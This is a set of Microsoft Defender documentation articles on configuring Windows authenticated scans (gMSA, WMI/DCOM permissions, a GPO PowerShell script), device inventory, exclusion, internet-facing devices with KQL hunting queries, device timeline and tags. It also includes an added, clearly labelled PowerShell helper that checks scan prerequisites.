You can modify an existing account with Get-ADServiceAccount and
Set-ADServiceAccount.

2. To install the AD service account, on the machine where the scanner agent will run,
using an elevated PowerShell window, run:

PowerShell

Install-ADServiceAccount -Identity gmsa1


If your PowerShell doesn't recognize those commands, it probably means you're missing
a required PowerShell module. Instructions on how to install the module vary depending
on your operating system. For more information, see Getting Started with Group
Managed Service Accounts.

Devices to be scanned
Use the table below for guidance on the configurations required, along with the
permissions needed for the scanning account, on each device to be scanned:

Note

The steps below are only one recommended way to configure the permissions on
each device to be scanned and use the Performance Monitor Users group. You can
also configure the permissions in the following ways:

Add the account to a different user group and give all the permissions
required to that group.
Give these permissions explicitly to the scanning account.

To configure and apply the permission to a group of devices to be scanned using a
group policy, see Configure a group of devices with a group policy.

Devices to be scanned requirements    Description

Windows Management Instrumentation (WMI) is enabled
To enable remote Windows Management Instrumentation (WMI):
- Verify the Windows Management Instrumentation service is running.
- Go to Control Panel > All Control Panel Items > Windows Defender Firewall >
  Allowed applications and ensure Windows Management Instrumentation (WMI) is
  allowed through Windows Firewall.

Scanning account is a member of Performance Monitor Users group
The scanning account must be a member of the Performance Monitor Users group on
the device to be scanned.

Performance Monitor Users group has 'Enable Account' and 'Remote Enable'
permissions on Root/CIMV2 WMI namespace
To verify or enable these permissions:
- Run wmimgmt.msc.
- Right-click WMI Control (Local) and select Properties.
- Go to the Security tab.
- Select the relevant WMI namespace and select Security.
- Add the specified group and select to allow the specific permissions.
- Select Advanced, choose the specified entry and select Edit.
- Set Applies To to "This namespace and subnamespaces".

Performance Monitor Users group should have permissions on DCOM operations
To verify or enable these permissions:
- Run dcomcnfg.
- Navigate to Component Services > Computers > My Computer.
- Right-click My Computer and choose Properties.
- Go to the COM Security tab.
- Go to Launch and Activation Permissions and select Edit Limits.
- Add the specified group and select to allow Remote Activation.
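As an added example (it is not part of this article or of the scanner), the following PowerShell function verifies the requirements in the table above on a device that is about to be scanned, so a failed test scan can be traced to a specific setting. It assumes the gmsa1 account from this article in the current domain; the registry locations it reads for the DCOM launch limits are my assumption, while the group SID S-1-5-32-558 and the 0x21 access mask are the ones used in the example PowerShell script later in this article.

```powershell
# Added verification helper; it is not part of the Microsoft documentation or of the scanner.
# Run it in an elevated Windows PowerShell window on a device that is going to be scanned, after
# applying the table above (or the GPO from the next section). Assumptions: the gMSA is the page's
# 'gmsa1' in the current domain, and the DCOM launch limits are read from the two registry values
# named in step 5 (my assumption of where the GPO and dcomcnfg store them). The group SID and the
# 0x21 mask are the ones in the page's example script.
function Test-MdvmScanTargetPrereqs {
    [CmdletBinding()]
    param (
        # gMSA created with New-ADServiceAccount, in DOMAIN\name$ form
        [string]$ScanningAccount = "$env:USERDOMAIN\gmsa1$",
        # Built-in Performance Monitor Users group
        [string]$GroupSid = 'S-1-5-32-558'
    )

    $results = [System.Collections.Generic.List[object]]::new()
    function Add-Result($Check, $Ok, $Detail) {
        $results.Add([pscustomobject]@{ Check = $Check; Ok = [bool]$Ok; Detail = $Detail })
    }
    $sid = New-Object System.Security.Principal.SecurityIdentifier($GroupSid)
    $groupName = $sid.Translate([System.Security.Principal.NTAccount]).Value   # BUILTIN\Performance Monitor Users

    # 1. The WMI service must be running.
    $winmgmt = Get-Service -Name Winmgmt
    Add-Result 'Winmgmt service running' ($winmgmt.Status -eq 'Running') "status $($winmgmt.Status)"

    # 2. The predefined WMI-In rule must be enabled, allow traffic and cover the Domain profile.
    $rules = Get-NetFirewallRule -DisplayName 'Windows Management Instrumentation (WMI-In)' -ErrorAction SilentlyContinue |
        Where-Object { $_.Enabled -eq 'True' -and $_.Action -eq 'Allow' -and $_.Profile.ToString() -match 'Any|Domain' }
    Add-Result 'WMI-In firewall rule enabled for Domain profile' ($null -ne $rules) "$(@($rules).Count) matching rule(s)"

    # 3. The scanning account must be a direct member of Performance Monitor Users.
    $members = @(Get-LocalGroupMember -SID $GroupSid -ErrorAction SilentlyContinue)
    $isMember = @($members | Where-Object { $_.Name -ieq $ScanningAccount }).Count -gt 0
    Add-Result "$ScanningAccount is a member of $groupName" $isMember "$($members.Count) member(s) in group"

    # 4. Root\CIMV2 DACL: an allow ACE for the group with Enable Account (0x1) and Remote Enable (0x20),
    #    the 0x21 mask the page's script grants. AceFlags 0x2 means it also applies to sub-namespaces.
    $sd = Invoke-WmiMethod -Namespace 'root\cimv2' -Path '__systemsecurity=@' -Name GetSecurityDescriptor
    $wmiAce = @($sd.Descriptor.DACL | Where-Object {
        $_.Trustee.SIDString -eq $GroupSid -and $_.AceType -eq 0 -and (($_.AccessMask -band 0x21) -eq 0x21) })
    $aceDetail = if ($wmiAce.Count) { 'AceFlags 0x{0:x}' -f $wmiAce[0].AceFlags } else { 'no matching allow ACE' }
    Add-Result "$groupName has Enable Account + Remote Enable on root\cimv2" ($wmiAce.Count -gt 0) $aceDetail

    # 5. DCOM machine launch restrictions: the GPO stores an SDDL string, dcomcnfg a binary descriptor
    #    (assumed locations). COM_RIGHTS_ACTIVATE_REMOTE is 0x10.
    $policy = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DCOM' -Name MachineLaunchRestriction -ErrorAction SilentlyContinue
    $local  = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Ole' -Name MachineLaunchRestriction -ErrorAction SilentlyContinue
    $raw = $null
    if ($policy) {
        $raw = [System.Security.AccessControl.RawSecurityDescriptor]::new([string]$policy.MachineLaunchRestriction)
        $source = 'group policy value'
    } elseif ($local) {
        $raw = [System.Security.AccessControl.RawSecurityDescriptor]::new([byte[]]$local.MachineLaunchRestriction, 0)
        $source = 'dcomcnfg limits value'
    }
    if ($null -eq $raw) {
        Add-Result "$groupName allowed Remote Activation (DCOM)" $false 'no MachineLaunchRestriction value found; verify in dcomcnfg'
    } else {
        $dcomAce = @($raw.DiscretionaryAcl | Where-Object {
            $_ -is [System.Security.AccessControl.CommonAce] -and $_.SecurityIdentifier.Value -eq $GroupSid -and
            $_.AceType -eq 'AccessAllowed' -and (($_.AccessMask -band 0x10) -eq 0x10) })
        Add-Result "$groupName allowed Remote Activation (DCOM)" ($dcomAce.Count -gt 0) "checked $source"
    }

    return $results
}

Test-MdvmScanTargetPrereqs | Format-Table -AutoSize
```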

Configure a group of devices with a group policy

A group policy will let you bulk apply the configurations required, as well as the
permissions required for the scanning account, to a group of devices to be scanned.

Follow these steps on a domain controller to configure a group of devices at the same
time:

Step: Create a new Group Policy Object
- On the domain controller, open the Group Policy Management Console.
- Follow these steps to Create a Group Policy Object.
- Once your Group Policy Object (GPO) is created, right-click on your GPO and select
  Edit to open the Group Policy Management Editor console and complete the steps
  below.

Step: Enable Windows Management Instrumentation (WMI)
To enable remote Windows Management Instrumentation (WMI):
- Go to Computer Configuration > Policies > Windows Settings > Security Settings >
  System Services.
- Right-click Windows Management Instrumentation.
- Select the Define this policy setting box and choose Automatic.

Step: Allow WMI through the firewall
To allow Windows Management Instrumentation (WMI) through the firewall:
- Go to Computer Configuration > Policies > Windows Settings > Security Settings >
  Windows Defender Firewall and Advanced Security > Inbound Rules.
- Right-click and select New Rule.
- Choose Predefined and select Windows Management Instrumentation (WMI) from the
  list. Then select Next.
- Select the Windows Management Instrumentation (WMI-In) checkbox. Then select Next.
- Select Allow the connection. Then select Finish.
- Right-click the newly added rule and select Properties.
- Go to the Advanced tab and uncheck the Private and Public options, as only Domain
  is required.

Step: Grant permissions to perform DCOM operations
To grant permissions to perform DCOM operations:
- Go to Computer Configuration > Policies > Windows Settings > Security Settings >
  Local Policies > Security Options.
- Right-click DCOM: Machine Launch Restrictions in Security Descriptor Definition
  Language (SDDL) syntax and select Properties.
- Select the Define this policy setting box and select Edit Security.
- Add the user or group you are granting permissions to and select Remote Activation.

Step: Grant permissions to the Root\CIMV2 WMI namespace by running a PowerShell
script via group policy
- Create a PowerShell script. See the Example PowerShell script later in this article
  for a recommended script you can modify according to your needs.
- Go to Computer Configuration > Policies > Windows Settings > Scripts
  (Startup/Shutdown) > Startup.
- Go to the PowerShell Scripts tab.
- Select Show Files and copy the script you created to this folder.
- Return to the scripts configuration window and select Add.
- Enter the script name.

Example PowerShell script
Use the following PowerShell script as a starting point to grant permissions to the
Root\CIMV2 WMI namespace via group policy:

PowerShell

Param ()

Process {
    $ErrorActionPreference = "Stop"
    # Performance Monitor Users built-in group; change the SID or pass it as a parameter as you wish
    $accountSID = "S-1-5-32-558"
    $computerName = "."

    $remoteparams = @{ComputerName = $computerName}
    $invokeparams = @{Namespace = "root\cimv2"; Path = "__systemsecurity=@"} + $remoteparams

    # Read the current security descriptor of the namespace
    $output = Invoke-WmiMethod @invokeparams -Name GetSecurityDescriptor
    if ($output.ReturnValue -ne 0) {
        throw "GetSecurityDescriptor failed: $($output.ReturnValue)"
    }

    $acl = $output.Descriptor

    $CONTAINER_INHERIT_ACE_FLAG = 0x2   # apply to this namespace and sub-namespaces
    $ACCESS_MASK = 0x21                 # Enable Account (0x1) + Remote Enable (0x20)

    # Build an allow ACE for the group
    $ace = (New-Object System.Management.ManagementClass("win32_Ace")).CreateInstance()
    $ace.AccessMask = $ACCESS_MASK
    $ace.AceFlags = $CONTAINER_INHERIT_ACE_FLAG

    $trustee = (New-Object System.Management.ManagementClass("win32_Trustee")).CreateInstance()
    $trustee.SidString = $accountSID
    $ace.Trustee = $trustee

    $ACCESS_ALLOWED_ACE_TYPE = 0x0
    $ace.AceType = $ACCESS_ALLOWED_ACE_TYPE

    # Append the ACE to the DACL and write the descriptor back
    $acl.DACL += $ace.psobject.immediateBaseObject

    $setparams = @{Name = "SetSecurityDescriptor"; ArgumentList = $acl.psobject.immediateBaseObject} + $invokeparams

    $output = Invoke-WmiMethod @setparams
    if ($output.ReturnValue -ne 0) {
        throw "SetSecurityDescriptor failed: $($output.ReturnValue)"
    }
}

Once the GPO policy is applied to a device, all the required settings will be applied and
your gMSA account will be able to access and scan the device.

Configure a new authenticated scan

To configure a new authenticated scan:

1. Go to Settings > Device discovery > Authenticated scans in the Microsoft
Defender portal.

2. Select Add new scan and choose Windows authenticated scan and select Next.

3. Enter a Scan name.

4. Select the Scanning device: The onboarded device you'll use to scan the
unmanaged devices.

5. Enter the Target (range): The IP address ranges or hostnames you want to scan.
You can either enter the addresses or import a CSV file. Importing a file will
override any manually added addresses.

6. Select the Scan interval: By default, the scan will run every four hours; you can
change the scan interval or have it run only once by selecting 'Do not repeat'.

7. Choose your Authentication method - there are two options to choose from:

Kerberos (preferred)
Negotiate

Note

The Negotiate option falls back to NTLM in cases where Kerberos fails. Using
NTLM isn't recommended because it isn't a secure protocol.

8. Enter the credentials Microsoft Defender Vulnerability Management will use to
remotely access the devices:

Use Azure KeyVault: If you manage your credentials in Azure KeyVault, you
can enter the Azure KeyVault URL and Azure KeyVault secret name to be
accessed by the scanning device to provide credentials.
For the Azure KeyVault secret value, use the gMSA account details in the format
Domain;Username.

9. Select Next to run or skip the test scan. For more information on test scans, see
Scan and add network devices.

10. Select Next to review the settings and then select Submit to create your new
authenticated scan.

Note

As the authenticated scanner currently uses an encryption algorithm that is not
compliant with Federal Information Processing Standards (FIPS), the scanner can't
operate when an organization enforces the use of FIPS compliant algorithms.

To allow algorithms that are not compliant with FIPS, set the following value in the
registry for the devices where the scanner will run:
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
with a DWORD value named Enabled and value of 0x0

FIPS compliant algorithms are only used in relation to departments and agencies of
the United States federal government.

Authenticated scan for Windows APIs

You can use APIs to create a new scan and view all existing configured scans in your
organization. For more information, see:

Get all scan definitions
Add, delete or update a scan definition
Get all scan agents
Get scan agent by Id
Get scan history by definition
Get scan history by session

Related articles
Network devices
Device inventory


Device inventory
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

The Device inventory shows a list of the devices in your network where alerts were
generated. By default, the queue displays devices seen in the last 30 days.

At a glance you see information such as domain, risk level, OS platform, and other
details for easy identification of devices most at risk.

Note

The device inventory is available in different Microsoft Defender XDR services. The
information available to you will differ depending on your license. You'll get the
most complete set of capabilities when using Microsoft Defender for Endpoint
Plan 2.

Note

Risk level, which can influence enforcement of conditional access and other security
policies in Microsoft Intune, is available in Windows today.

There are several options you can choose from to customize the devices list view. On
the top navigation you can:

Add or remove columns
Export the entire list in CSV format
Select the number of items to show per page
Apply filters

During the onboarding process, the Devices list is gradually populated with devices as
they begin to report sensor data. Use this view to track your onboarded endpoints as
they come online, or download the complete endpoint list as a CSV file for offline
analysis.

Note

If you export the device list, it will contain every device in your organization. It
might take a significant amount of time to download, depending on how large your
organization is. Exporting the list in CSV format displays the data in an unfiltered
manner. The CSV file will include all devices in the organization, regardless of any
filtering applied in the view itself.

Sort and filter the device list

You can apply the following filters to limit the list of alerts and get a more focused view.

Device name
During the Microsoft Defender for Endpoint onboarding process, devices onboarded to
MDE are gradually populated into the device inventory as they begin to report sensor
data. Following this, the device inventory is populated by devices that are discovered in
your network through the device discovery process. The device inventory has three tabs
that list devices by:

Computers and Mobile: Enterprise endpoints (workstations, servers, and mobile
devices)
Network devices: Devices like routers and switches
IoT devices: Devices like printers and cameras

Navigate to the Device inventory page

Access the device inventory page by selecting Devices from the Assets navigation menu
in the Microsoft Defender portal.

Device inventory overview

The device inventory opens on the Computers and Mobile tab. At a glance you see
information such as device name, domain, risk level, exposure level, OS platform,
onboarding status, sensor health state, and other details for easy identification of
devices most at risk.

Use the Onboarding Status column to sort and filter by discovered devices, and devices
that are already onboarded to Microsoft Defender for Endpoint.

From the Network devices and IoT devices tabs, you'll also see information such as
vendor, model, and device type:

Note

Device discovery integration with Microsoft Defender for IoT is available to help
locate, identify, and secure your complete OT/IoT asset inventory. Devices
discovered with this integration will appear on the IoT devices tab. For more
information, see Device discovery integration.

When Defender for IoT is configured, you can also view the devices there. See
Manage your IoT devices with the device inventory for organizations.

At the top of each device inventory tab, you can see the total number of devices, the
number of devices that aren't yet onboarded, and the number of devices that are
identified as a higher risk to your organization. You can use this information to help you
prioritize devices for security posture improvements.

The Newly discovered device count for network devices and IoT devices tabs, shows the
number of new devices discovered, in the last 7 days, listed in the current view.

Explore the device inventory

There are several options you can choose from to customize the device inventory view.
On the top navigation for each tab you can:

Search for a device by name
Search for a device by the most recently used IP address or IP address prefix
Add or remove columns
Export the entire list in CSV format for offline analysis
Select the date range to display
Apply filters

Note

If you export the device list, it will contain every device in your organization. It
might take a significant amount of time to download, depending on how large your
organization is. Exporting the list in CSV format displays the data in an unfiltered
manner. The CSV file will include all devices in the organization, regardless of any
filtering applied in the view itself.

You can use the sort and filter functionality available on each device inventory tab to get
a more focused view, and to help you assess and manage the devices in your
organization.

The counts on the top of each tab will be updated based on the current view.

Use filters to customize the device inventory views

Filter: Risk level
The risk level reflects the overall risk assessment of the device based on a
combination of factors, including the types and severity of active alerts on the
device. Resolving active alerts, approving remediation activities, and suppressing
subsequent alerts can lower the risk level.

Filter: Exposure level
The exposure level reflects the current exposure of the device based on the
cumulative impact of its pending security recommendations. The possible levels
are low, medium, and high. Low exposure means your devices are less vulnerable
to exploitation.

If the exposure level says "No data available," there are a few reasons why:
- Device stopped reporting for more than 30 days. In that case it's considered
  inactive, and the exposure isn't computed.
- Device OS not supported; see minimum requirements for Microsoft Defender
  for Endpoint.
- Device with stale agent (unlikely).

Filter: Tags
Filter the list based on the grouping and tagging that you've added to individual
devices. See Create and manage device tags.

Filter: Device value
Filter the list based on whether the device is marked as high value or low value.

Filter: Exclusion state
Filter the list based on whether or not the device is excluded. For more
information, see Exclude devices.

Filter: OS Platform (Computers and mobile and IoT devices only)
Filter by the OS platforms you're interested in investigating.

Filter: First seen (Computers and mobile and IoT devices only)
Filter your view based on when the device was first seen in the network or when
it's first reported by the Microsoft Defender for Endpoint sensor.

Filter: Windows version (Computers and mobile only)
Filter by the Windows versions you're interested in investigating. If 'future
version' appears in the Windows version field, it can mean:
- This is a prerelease build for a future Windows release
- The build has no version name
- The build version name isn't yet supported
In all these scenarios, where available, the full OS version can be seen in the
device details page.

Filter: Sensor health state (Computers and mobile only)
Filter by the following sensor health states, for devices onboarded to Microsoft
Defender for Endpoint:
- Active: Devices that are actively reporting sensor data to the service.
- Inactive: Devices that stopped sending signals for more than seven days.
- Misconfigured: Devices that have impaired communications with the service or are
  unable to send sensor data.
Misconfigured devices can further be classified as:
- No sensor data
- Impaired communications
For more information on how to address issues on misconfigured devices, see
Fix unhealthy sensors.

Filter: Onboarding status (Computers and mobile only)
Onboarding status indicates whether the device is currently onboarded to
Microsoft Defender for Endpoint or not. Device discovery must be enabled for
this filter to appear. You can filter by the following states:
- Onboarded: The endpoint is onboarded to Microsoft Defender for Endpoint.
- Can be onboarded: The endpoint was discovered in the network as a supported
  device, but it's not currently onboarded. Microsoft highly recommends
  onboarding these devices.
- Unsupported: The endpoint was discovered in the network, but isn't supported
  by Microsoft Defender for Endpoint.
- Insufficient info: The system couldn't determine the supportability of the
  device.

Filter: Antivirus status (Computers and mobile only)
Filter the view based on whether the antivirus status is disabled, not updated, or
unknown.

Filter: Group (Computers and mobile only)
Filter the list based on the group you're interested in investigating.

Filter: Managed by (Computers and mobile only)
Managed by indicates how the device is being managed. You can filter by:
- Microsoft Defender for Endpoint
- Microsoft Intune, including co-management with Microsoft Configuration
  Manager via tenant attach
- Microsoft Configuration Manager (ConfigMgr)
- Unknown: This could be due to running an outdated Windows version,
  GPO management, or another non-Microsoft MDM.

Filter: Device Type (IoT devices only)
Filter by the device type you're interested in investigating.

Filter: Mitigation status
Filter by isolation or containment status of a device.

Use columns to customize the device inventory views

You can add or remove columns from the view and sort the entries by clicking on an
available column header.

On the Computer and Mobiles tab, select Customize columns to see the columns
available. The default values are checked in the following image:
On the Network devices tab, select Customize columns to see the columns available.
The default values are checked in the following image:
On the IoT devices tab, select Customize columns to see the columns available. The
default values are checked in the following image:
Related articles
Investigate devices in the Microsoft Defender for Endpoint Devices list

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Exclude devices
Article • 02/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Exclude devices from vulnerability management

Excluding devices that are inactive, duplicate, or out of scope allows you to focus on
discovering and prioritizing the risks on your active devices. This action can also help
reflect a more accurate vulnerability management exposure score, as the excluded
devices won't be visible in your vulnerability management reports.

Once devices are excluded, you won't be able to view updated or relevant information
about vulnerabilities and installed software on these devices. It affects all vulnerability
management pages, reports, and related tables in advanced hunting.

Even though the device exclusion feature removes the device data from vulnerability
management pages and reports, the devices remain connected to the network and can
still be a risk to the organization. You'll be able to cancel the device exclusion at any
time.

How to exclude a device

You can choose to exclude a single device or multiple devices at the same time.

Exclude a single device

1. Go to the Device inventory page and select the device to exclude.

2. Select Exclude from the action bar on the device inventory page or from the
actions menu in the device flyout.
3. Select a justification:

Inactive device
Duplicate device
Device doesn't exist
Out of scope
Other

4. Type a note and select Exclude device.


You can also exclude a device from its device page.

Note

Excluding active devices is not recommended, since it is especially risky to not have
visibility into their vulnerability info. If a device is active and you try to exclude it,
you'll get a warning message and a confirmation pop-up asking if you are sure you
want to exclude an active device.

It can take up to 10 hours for a device to be fully excluded from vulnerability
management views and data.

Excluded devices are still visible in the Device inventory list. You can manage your view
of excluded devices by:

- Adding the Exclusion state column to the device inventory view.
- Using the Exclusion state filter to view the relevant list of devices.

Bulk device exclusion

You can also choose to exclude multiple devices at the same time:

1. Go to the Device inventory page and select the devices to exclude.

2. From the actions bar, select Exclude.

3. Choose a justification and select Exclude device.

If you select multiple devices in the device list with different exclusion statuses, the
exclude selected devices flyout will provide you details on how many of the selected
devices are already excluded. You can exclude the devices again, but the justification
and notes will be overridden.
Once a device is excluded, if you go to the device page of an excluded device, you won't
be able to see data for discovered vulnerabilities, software inventory or security
recommendations. The data also won't show up in vulnerability management pages,
related advanced hunting tables and the vulnerable devices report.

Stop excluding a device

You'll be able to stop excluding a device at any time. Once devices are no longer
excluded, their vulnerability data will be visible in vulnerability management pages,
reports, and in advanced hunting. It may take up to 8 hours for the changes to take
effect.

1. Go to the Device inventory, select the excluded device to open the flyout, and then
select Exclusion details
2. Select Stop exclusion
See also
Device inventory


Internet-facing devices
Article • 07/10/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender for Business

Want to experience Defender for Endpoint? Sign up for a free trial.

As threat actors continuously scan the web to detect exposed devices they can exploit
to gain a foothold in internal corporate networks, mapping your organization's external
attack surface is a key part of your security posture management. Devices that can be
connected to or are approachable from the outside pose a threat to your organization.

Microsoft Defender for Endpoint automatically identifies and flags onboarded, exposed,
internet-facing devices in the Microsoft Defender portal . This critical information
provides increased visibility into an organization's external attack surface and insights
into asset exploitability.

Note

Currently, only Windows devices onboarded to Microsoft Defender for Endpoint
can be identified as internet-facing. Support for other platforms will be available in
upcoming releases.

Devices flagged as internet-facing

Devices that are successfully connected through TCP or identified as host reachable
through UDP will be flagged as internet-facing in the Microsoft Defender portal .
Defender for Endpoint uses different data sources to identify the devices to flag:

- External scans are used to identify which devices are approachable from the
  outside.
- Device network connections, captured as part of Defender for Endpoint signals,
  help to identify external incoming connections that reach internal devices.

Devices can be flagged as internet-facing when a configured firewall policy (host firewall
rule or enterprise firewall rule) allows inbound internet communication.

Understanding your firewall policy, and your devices that are intentionally internet-
facing as opposed to those that may compromise your organization, provides critical
information when it comes to mapping your external attack surface.

View internet-facing devices

For each onboarded device identified as internet-facing, the internet facing tag appears
in the Tags column in the device inventory in the Microsoft Defender portal. To view
internet-facing devices:

1. Go to Assets > Device in the Microsoft Defender portal .

Hover over the internet-facing tag to see why it was applied. Possible reasons are:

- This device was detected by an external scan
- This device received external incoming communication

At the top of the page, you can view a counter that shows the number of devices that
have been identified as internet-facing and are potentially less secure.

You can use filters to focus in on internet-facing devices and investigate the risk they
may introduce into your organization.

Note

If no new events for a device occur for 48 hours, the Internet-facing tag is removed
and it will no longer be visible in the Microsoft Defender portal.

Investigate your internet-facing devices

To learn more about an internet-facing device, select the device in the device inventory
to open its flyout pane:

This pane includes details on whether the device was detected by a Microsoft external
scan or received an external incoming communication. The external network interface
address and port fields provide details on the external IP and port that were scanned at
the time this device was identified as internet facing.

The local network interface address and port for this device, along with the last time the
device was identified as internet facing are also shown.

Use advanced hunting

Use advanced hunting queries to gain visibility and insights into the internet-facing
devices in your organization, for example:

Get all internet facing devices

Use this query to find all devices that are internet facing.

Kusto

// Find all devices that are internet-facing
DeviceInfo
| where Timestamp > ago(7d)
| where IsInternetFacing
| extend InternetFacingInfo = AdditionalFields
| extend InternetFacingReason = extractjson("$.InternetFacingReason", InternetFacingInfo, typeof(string)),
    InternetFacingLocalPort = extractjson("$.InternetFacingLocalPort", InternetFacingInfo, typeof(int)),
    InternetFacingScannedPublicPort = extractjson("$.InternetFacingPublicScannedPort", InternetFacingInfo, typeof(int)),
    InternetFacingScannedPublicIp = extractjson("$.InternetFacingPublicScannedIp", InternetFacingInfo, typeof(string)),
    InternetFacingLocalIp = extractjson("$.InternetFacingLocalIp", InternetFacingInfo, typeof(string)),
    InternetFacingTransportProtocol = extractjson("$.InternetFacingTransportProtocol", InternetFacingInfo, typeof(string)),
    InternetFacingLastSeen = extractjson("$.InternetFacingLastSeen", InternetFacingInfo, typeof(datetime))
| summarize arg_max(Timestamp, *) by DeviceId

This query returns the following fields for each internet-facing device, with their
aggregated evidence in the "AdditionalFields" column.

- InternetFacingReason: Whether the device was detected by an external scan or
  received incoming communication from the internet
- InternetFacingLocalIp: The local IP address of the internet facing interface
- InternetFacingLocalPort: The local port where internet facing communication was
  observed
- InternetFacingPublicScannedIp: The public IP address that was externally scanned
- InternetFacingPublicScannedPort: The internet facing port that was externally
  scanned
- InternetFacingTransportProtocol: The transport protocol used (TCP/UDP)

Get information on inbound connections

For TCP connections, you can gain further insights into applications or services identified
as listening on a device by querying DeviceNetworkEvents.

Use the following query for devices tagged with the reason This device received
external incoming communication:

Kusto

// Use this function to obtain the device incoming communication from public IP addresses
// Input:
// DeviceId - the device ID that you want to investigate.
// The function will return the last 7 days of data.
InboundExternalNetworkEvents("<DeviceId>")

Note

Process related information is only available for TCP connections.

Use the following query for devices tagged with the reason This device was detected by
an external scan:

Kusto

DeviceNetworkEvents
| where Timestamp > ago(7d)
| where DeviceId == ""
| where Protocol == "Tcp"
| where ActionType == "InboundInternetScanInspected"

For UDP connections, gain insights into devices that were identified as host reachable
but may not have established a connection (for example, as a result of the host firewall
policy) using the following query:

Kusto

DeviceNetworkEvents
| where Timestamp > ago(7d)
| where DeviceId == ""
| where Protocol == "Udp"
| where ActionType == "InboundInternetScanInspected"

If the above queries fail to provide the relevant connections, you can use socket
collection methods to retrieve the source process. To learn more about different tools
and capabilities available to do this, see:

- Defender for Endpoint live response
- Microsoft Network Monitor
- Netstat for Windows

Report inaccuracy
You can report an inaccuracy for a device with incorrect internet-facing information. For
the internet-facing device:

1. Open the device flyout from the Device inventory page.
2. Select Report device inaccuracy.
3. In the What part is inaccurate dropdown, select Device information.
4. For Which information is inaccurate, select the internet facing classification
checkbox from the dropdown.
5. Fill in the requested details about what the correct information should be.
6. Provide an email address (optional).
7. Select Submit Report.

See also
Device inventory


Microsoft Defender for Endpoint device timeline
Article • 11/06/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Note

Want to experience Defender for Endpoint? Sign up for a free trial.

The Defender for Endpoint device timeline helps you research and investigate
anomalous behavior on your devices more quickly. You can explore specific events and
endpoints to review potential attacks in your organization. You can review specific times
of each event, set flags to follow up for potentially connected events, and filter to
specific date ranges.

Custom time range picker:
Process tree experience – event side panel:
All MITRE techniques are shown when there's more than one related technique:
Timeline events are linked to the new user page:
Defined filters are now visible at the top of the timeline:

Techniques in the device timeline

You can gain more insight in an investigation by analyzing the events that happened on
a specific device. First, select the device of interest from the Devices list. On the device
page, you can select the Timeline tab to view all the events that occurred on the device.

Understand techniques in the timeline

Important

Some information relates to a prereleased product feature in public preview which
may be substantially modified before it's commercially released. Microsoft makes
no warranties, express or implied, with respect to the information provided here.

In Microsoft Defender for Endpoint, Techniques are an additional data type in the event
timeline. Techniques provide more insight on activities associated with MITRE ATT&CK
techniques or subtechniques.
This feature simplifies the investigation experience by helping analysts understand the
activities that were observed on a device. Analysts can then decide to investigate further.

During preview, Techniques are available by default and shown together with events
when a device's timeline is viewed.

Techniques are highlighted in bold text and appear with a blue icon on the left. The
corresponding MITRE ATT&CK ID and technique name also appear as tags under
Additional information.

Search and Export options are also available for Techniques.

Investigate using the side pane

Select a Technique to open its corresponding side pane. Here you can see additional
information and insights like related ATT&CK techniques, tactics, and descriptions.

Select the specific Attack technique to open the related ATT&CK technique page where
you can find more information about it.

You can copy an entity's details when you see a blue icon on the right. For instance, to
copy a related file's SHA1, select the blue page icon.

You can do the same for command lines.


Investigate related events

To use advanced hunting to find events related to the selected Technique, select Hunt
for related events. This leads to the advanced hunting page with a query to find events
related to the Technique.

Note

Querying using the Hunt for related events button from a Technique side pane
displays all the events related to the identified technique but does not include the
Technique itself in the query results.

Customize your device timeline

On the upper right-hand side of the device timeline, you can choose a date range to
limit the number of events and techniques in the timeline.

You can customize which columns to expose. You can also filter for flagged events by
data type or by event group.

Choose columns to expose

You can choose which columns to expose in the timeline by selecting the Choose
columns button.

From there you can select which information set to include.

Filter to view techniques or events only

To view only either events or techniques, select Filters from the device timeline and
choose your preferred Data type to view.

Timeline event flags

Event flags in the Defender for Endpoint device timeline help you filter and organize
specific events when you're investigating potential attacks.

The Defender for Endpoint device timeline provides a chronological view of the events
and associated alerts observed on a device. This list of events provides full visibility into
any events, files, and IP addresses observed on the device. The list can sometimes be
lengthy. Device timeline event flags help you track events that could be related.

After you've gone through a device timeline, you can sort, filter, and export the specific
events that you flagged.

While navigating the device timeline, you can search and filter for specific events. You
can set event flags by:

- Highlighting the most important events
- Marking events that require deep dive
- Building a clean breach timeline

Flag an event
1. Find the event that you want to flag.

2. Select the flag icon in the Flag column.


View flagged events

1. In the timeline Filters section, enable Flagged events.
2. Select Apply. Only flagged events are displayed.

You can apply more filters by clicking on the time bar. This will only show events prior to
the flagged event.


Create and manage device tags
Article • 11/15/2023

Note

Want to experience Microsoft Defender XDR? Learn more about how you can
evaluate and pilot Microsoft Defender XDR.

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Add tags on devices to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident. Tags can be used as a filter in the
Device inventory view, or to group devices. For more information on device grouping,
see Create and manage device groups.

Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

You can add tags on devices using the following ways:

- Using the portal
- Setting a registry key value

Note

There may be some latency between the time a tag is added to a device and its
availability in the devices list and device page.

To add device tags using API, see Add or remove device tags API.

Add and manage device tags using the portal

1. Select the device that you want to manage tags on. You can select or search for a
device from any of the following views:

Alerts queue - Select the device name beside the device icon from the alerts
queue.

Devices inventory - Select the device name from the list of devices.

Search box - Select Device from the drop-down menu and enter the device
name.

You can also get to the alert page through the file and IP views.

2. Select Manage tags from the row of Response actions.

3. Type to find or create tags

Tags are added to the device view and will also be reflected on the Devices inventory
view. You can then use the Tags filter to see the relevant list of devices.

Note

Filtering might not work on tag names that contain parentheses or commas.

